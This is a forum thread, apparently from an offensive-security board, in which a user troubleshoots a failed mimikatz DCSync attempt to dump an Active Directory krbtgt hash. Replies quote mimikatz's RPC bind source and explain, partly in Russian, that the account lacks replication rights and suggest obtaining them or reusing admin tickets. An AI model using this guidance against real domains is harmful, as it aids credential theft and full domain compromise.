lsadump::dcsync for krgbt hash

[TheExample]

Hello everyone, good time

ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)

Whats the reason for this error in kiwi?

 

[Stupor]

See sources mimikatz & debug it:

BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
    BOOL status = FALSE;
    ULONG drsStatus;
    DRS_EXTENSIONS_INT *pDrsExtensionsOutput = NULL;
    RpcTryExcept
    {
        drsStatus = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) pDrsExtensionsInt, (DRS_EXTENSIONS **) &pDrsExtensionsOutput, hDrs); // to free ?
        if(drsStatus == 0)
        {
            if(pDrsExtensionsOutput)
            {
                if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, SiteObjGuid) - sizeof(DWORD))
                {
                    if(pDrsExtensionsOutput->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
                        status = TRUE;
                    else PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", pDrsExtensionsOutput->dwFlags);

                    if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, Pid) - sizeof(DWORD))
                    {
                        pDrsExtensionsInt->SiteObjGuid = pDrsExtensionsOutput->SiteObjGuid;
                        if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwFlagsExt) - sizeof(DWORD))
                        {
                            pDrsExtensionsInt->dwReplEpoch = pDrsExtensionsOutput->dwReplEpoch;
                            if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, ConfigObjGUID) - sizeof(DWORD))
                            {
                                pDrsExtensionsInt->dwExtCaps = MAXDWORD32;
                                //pDrsExtensionsInt->dwFlagsExt = pDrsExtensionsOutput->dwFlagsExt & (DRS_EXT_RECYCLE_BIN | DRS_EXT_PAM);
                                if(pDrsExtensionsOutput->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
                                    pDrsExtensionsInt->ConfigObjGUID = pDrsExtensionsOutput->ConfigObjGUID;
                            }
                        }
                    }
                }
                else PRINT_ERROR(L"Incorrect DRS Extensions Output Size (%u)\n", pDrsExtensionsOutput->cb);
                MIDL_user_free(pDrsExtensionsOutput);
            }
            else PRINT_ERROR(L"No DRS Extensions Output\n");

            if(!status)
                IDL_DRSUnbind(hDrs);
        }
        else PRINT_ERROR(L"IDL_DRSBind: %u\n", drsStatus);
    }
    RpcExcept(RPC_EXCEPTION)
        PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
    RpcEndExcept
        return status;
}

Or read this: https://www.sentinelone.com/blog/samaccountname-spoofing-kdc-bamboozing/

 

[rwxrwx]

The error code 0x00000005 (5) often corresponds to an "Access Denied" error in Windows; did you run Mimikatz as administrator?

 

[TheExample]

The error code 0x00000005 (5) often corresponds to an "Access Denied" error in Windows; did you run Mimikatz as administrator?

yes , we run as administrator but say this error

 

[greywraith]

Make sure the host you run mimi on has domain rights to dcsync.

 

[IIIIXX]

Это ремоут ошибка а не локальная, у тебя нету прав для дампа нтдс, как минимум с тем контекстом который ты указал в команде.

 

[xargs]

Зачем запускать мимик от админа там где он нафиг не нужен, нужен пользователь с правами на dsync или же запушить его билеты админу